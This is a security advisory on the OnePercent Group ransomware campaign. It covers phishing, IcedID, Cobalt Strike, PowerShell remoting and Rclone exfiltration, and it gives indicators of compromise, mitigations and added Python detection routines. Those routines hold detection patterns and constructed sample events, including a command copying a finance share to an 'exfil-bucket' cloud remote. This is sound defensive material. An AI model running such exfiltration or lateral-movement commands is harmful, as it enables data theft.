Ransomware attack 2021: Activities related to OnePercent Group ransomware attacking enterprises through the IcedID banking Trojan.
It has been reported that a ransomware operator dubbed the OnePercent Group has been attacking enterprise networks using the Cobalt Strike post-exploitation toolkit and remote PowerShell commands.
The group primarily relies on the following tactics for its attacks:
1. Phishing email campaigns deliver a malicious zip file as an attachment. The zip file contains Microsoft Office documents (Word or Excel) with malicious macros.
2. Once the victim opens the document, its macros infect the system with the IcedID banking trojan. IcedID then downloads additional software to deploy further payloads on the infected network.
3. The malware is then used to install and execute the Cobalt Strike penetration-testing framework on the compromised network, which moves laterally across the victim's network using PowerShell (primarily PowerShell remoting).
4. OnePercent Group actors encrypt the data and exfiltrate it from the victim's servers using Rclone.
5. Once the ransomware is successfully deployed, the actors contact the victims via spoofed phone numbers with ransom demands and provide a ProtonMail email address for further communication, threatening to release the stolen data on the dark web and/or the open Internet unless a ransom is paid in virtual currency.
6. OnePercent Group actors' extortion tactics begin with a warning and progress from a partial leak of data to a full leak of all the victim's exfiltrated data.
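Added example (not from the advisory or its sources): a Python triage routine that maps process-creation events to the stages above: an Office application spawning a child process, the dropper paths listed under the IoCs, PowerShell remoting, and an Rclone push to a cloud remote. The events are constructed and the stage rules are heuristics chosen here; the advisory names the tools but does not give these detection rules.

```python
import re
from pathlib import PureWindowsPath

OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Malware paths from the advisory's IoC section (matched case-insensitively).
DROPPER_MARKERS = ("temp1_request.zip", "vexby.txt")
# rclone copy/sync/move to a 'remote:' target; remote names need 2+ chars so 'c:\' can't match.
RCLONE_PUSH = re.compile(r"\b(copy|sync|move)\s+\S+\s+[a-z0-9_-]{2,}:[^\\\s]")

def classify_event(parent_image: str, image: str, cmdline: str) -> list[str]:
    """Map one process-creation event (Sysmon Event ID 1 style fields) to the
    kill-chain stages the advisory describes; an event can hit several."""
    parent = PureWindowsPath(parent_image).name.lower()
    child = PureWindowsPath(image).name.lower()
    cmd, stages = cmdline.lower(), []
    # Stages 1-2: a Word/Excel macro launching a non-Office process (IcedID).
    if parent in OFFICE_HOSTS and child not in OFFICE_HOSTS:
        stages.append("office-macro-child")
    if any(m in cmd or m in image.lower() for m in DROPPER_MARKERS):
        stages.append("icedid-dropper-path")
    # Stage 3: PowerShell remoting (wsmprovhost.exe hosts inbound sessions).
    if child == "wsmprovhost.exe" or (child in ("powershell.exe", "pwsh.exe")
            and re.search(r"invoke-command|enter-pssession|-computername", cmd)):
        stages.append("powershell-remoting")
    # Stage 4: Rclone exfiltration (binary often renamed, so match argument shape too).
    if child == "rclone.exe" or RCLONE_PUSH.search(cmd):
        stages.append("rclone-exfiltration")
    return stages

def triage(events) -> dict[str, int]:
    """Count hits per stage over (parent, image, cmdline) tuples; several stages on one host is what to escalate."""
    counts: dict[str, int] = {}
    for ev in events:
        for s in classify_event(*ev):
            counts[s] = counts.get(s, 0) + 1
    return counts

# Constructed events, not real telemetry from the advisory.
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
SAMPLE_EVENTS = [
    (OFFICE, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c start %PROGRAMDATA%\vexby.txt"),
    (r"C:\Windows\explorer.exe", OFFICE,
     r'WINWORD.EXE /n "C:\Users\u\AppData\Local\Temp\Temp1_request.zip\request.doc"'),
    (r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\wsmprovhost.exe", "wsmprovhost.exe"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -nop -c Invoke-Command -ComputerName FS01 -ScriptBlock {whoami}"),
    (r"C:\Windows\System32\cmd.exe", r"C:\ProgramData\svc.exe",
     r"svc.exe copy D:\Shares\Finance s3:exfil-bucket/fin --config C:\ProgramData\rc.conf"),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", r"notepad.exe C:\notes.txt"),
]
```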

File Names and Tools Used by Attackers
The OnePercent threat actors leverage the following tools to compromise a victim company's enterprise network:
1. AWS S3 cloud
2. IcedID
3. Cobalt Strike
4. PowerShell
5. Rclone
6. Mimikatz
7. SharpKatz
8. BetterSafetyKatz
9. SharpSploit
Indicators of Compromise (IoCs):
1. File Extension of Encrypted Files:
The OnePercent Group encrypts files, appends a random eight-character extension (e.g., dZCqciA) to their filenames, and drops ransom notes that reference the .onion website operated by the threat actors.
2. IPs and Domains:
3. Hashes:
4. TOR URLs and Email address:
hXXp://5mvifa3xq5m7sou3xzaajfz7h6eserp5fnkwotohns5pgbb5oxty3zad.onion
1percentransom@protonmail.com
5. Observed Malware Filenames & Paths:
%TEMP%\Temp1_request.zip\[FILENAME].doc
%PROGRAMDATA%\vexby.txt
6. BTC Address: bc1qds0yly3fn608gtm332gag029munvlute2wxktn
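Added example (not part of the advisory): a Python scan of a file listing for the encryption artefacts described under IoC 1. It assumes the random extension is 7 or 8 letters (the advisory says eight, while its own sample dZCqciA is seven) and that a ransom note is a small text file referencing .onion; the listing and its contents are constructed.

```python
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# The advisory reports encrypted files gaining a random alphabetic extension of
# about eight characters (its own sample, dZCqciA, is seven), so accept 7 or 8.
RANDOM_EXT = re.compile(r"^[A-Za-z]{7,8}$")
# Legitimate extensions that happen to fit the pattern; extend for your estate.
KNOWN_EXTS = {"manifest", "markdown", "settings", "template", "torrent", "metadata"}
NOTE_EXTS = {"txt", "html", "hta"}

def has_random_ext(path: str) -> bool:
    p = PureWindowsPath(path)
    ext = p.suffix[1:]
    if not ext or ext.lower() in KNOWN_EXTS or not RANDOM_EXT.match(ext):
        return False
    # The stem should still look like a normal file ("report.docx.dZCqciAB");
    # a bare name with one odd suffix is far more likely to be legitimate.
    return "." in p.stem

def scan_listing(entries, min_files=3, min_ratio=0.5):
    """entries: (path, text_preview) pairs, the preview being the first bytes
    decoded as text ('' for binaries). Returns suspect directories, ransom
    notes and the set of extensions seen, for triage."""
    per_dir = defaultdict(lambda: [0, 0])  # directory -> [random-ext hits, total]
    notes, exts = [], set()
    for path, preview in entries:
        p = PureWindowsPath(path)
        d = str(p.parent)
        per_dir[d][1] += 1
        if has_random_ext(path):
            per_dir[d][0] += 1
            exts.add(p.suffix[1:])
        elif p.suffix[1:].lower() in NOTE_EXTS and ".onion" in preview.lower():
            notes.append(path)
    suspect = sorted(d for d, (hit, total) in per_dir.items()
                     if hit >= min_files and hit / total >= min_ratio)
    return {"suspect_dirs": suspect, "ransom_notes": notes, "extensions": exts}

# Constructed listing, not data from the advisory (the .onion address is a placeholder).
SAMPLE = [
    (r"D:\Shares\Finance\q2.xlsx.dZCqciAB", ""),
    (r"D:\Shares\Finance\budget.docx.dZCqciAB", ""),
    (r"D:\Shares\Finance\ledger.pdf.dZCqciAB", ""),
    (r"D:\Shares\Finance\README.txt", "Your files are encrypted. See http://example-placeholder.onion"),
    (r"D:\Shares\Finance\notes.txt", "meeting on monday"),
    (r"C:\Program Files\App\app.manifest", ""),
    (r"C:\Users\u\Documents\thesis.markdown", ""),
]
```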
Recommendations: The following steps can be taken to prevent further such infections:
1. Perform regular backups of all critical information to limit the impact of data or system loss and to help expedite the recovery process. Ideally, this data should be kept on a separate device, and backups should be stored offline.
2. Keep the operating system and third-party applications (MS Office, browsers, browser plugins) up to date with the latest patches.
3. Maintain updated antivirus software on all systems.
4. Don't open attachments in unsolicited emails, even if they come from people in your contact list, and never click on a URL contained in an unsolicited e-mail, even if the link seems benign. In cases of genuine URLs, close the email and go to the organization's website directly through the browser.
5. To address malicious activity initiated through weaponized Office documents, use rules that block advanced macro activity, executable content, process creation, and process injection initiated by Office applications (to assess the impact of these rules, deploy them in audit mode first). Turn on AMSI for Office VBA on Office 365.
6. Consider implementing Microsoft Local Administrator Password Solution (LAPS) for Windows Active Directory environments.
7. Ensure administrators are not using "Admin Approval" mode.
8. Back up critical data offline.
9. Use multi-factor authentication with strong passphrases.
10. Do not enable macros if prompted by documents received from untrusted sources.
11. Physically block and lock USB and Ethernet ports against local cyber threats.
Best Practices and Recommendations to protect users against the threat of Ransomware:
1. Update software and operating systems with the latest patches. Outdated applications and operating systems are the targets of most attacks.
2. Scan all incoming and outgoing emails to detect threats and filter executable files from reaching end users.
3. Network segmentation and segregation into security zones help protect sensitive information and critical services. Separate the administrative network from business processes with physical controls and Virtual Local Area Networks.
4. Restrict users’ permissions to install and run software applications, and apply the principle of “least privilege” to all systems and services. Restricting these privileges may prevent malware from running or limit its capability to spread through a network.
5. Configure firewalls to block access to known malicious IP addresses.
6. Disable RDP if not in use; if it is required, place it behind the firewall and bind users to proper policies while using RDP.
7. Restrict execution of PowerShell/WSCRIPT in the enterprise environment. Ensure installation and use of the latest version of PowerShell with enhanced logging enabled (script block logging and transcription). Send the associated logs to a centralized log repository for monitoring and analysis.
8. Establish a Sender Policy Framework (SPF) record for your domain. SPF is an email validation system designed to prevent spam by detecting email spoofing, which is how most ransomware samples reach corporate mailboxes.
9. Apply application whitelisting and a strict implementation of Software Restriction Policies (SRP) to block binaries running from %APPDATA% and %TEMP% paths. Ransomware samples generally drop and execute from these locations.
10. Don't open attachments in unsolicited emails, even if they come from people in your contact list, and never click on a URL contained in an unsolicited e-mail, even if the link seems benign. In cases of genuine URLs, close the email and go to the organization's website directly through the browser.
11. Block attachments of the file types exe|pif|tmp|url|vb|vbe|scr|reg|cer|pst|cmd|com|bat|dll|dat|hlp|hta|js|wsf. Consider encrypting confidential data, as ransomware generally targets common file types.
12. Carry out Vulnerability Assessment and Penetration Testing (VAPT) and information security audits of critical networks/systems, especially database servers. Repeat audits at regular intervals.
13. Perform regular backups of all critical information to limit the impact of data or system loss and to help expedite the recovery process. Ideally, this data should be kept on a separate device, and backups should be stored offline.
14. Implement measures to control the use of VBA/macros in Office documents, and control permissible attachment types in email systems.
References
https://www.ic3.gov/Media/News/2021/210823.pdf
https://www.cert-in.org.in/s2cMainServlet?pageid=PUBADV01&CACODE=CICA-2021-2969
https://www.securityweek.com/fbi-shares-details-onepercent-group-ransomware-operators
https://www.cyberswachhtakendra.gov.in/alerts/ransomware.html
Disclaimer
The information provided herein is on “as is” basis, without warranty of any kind.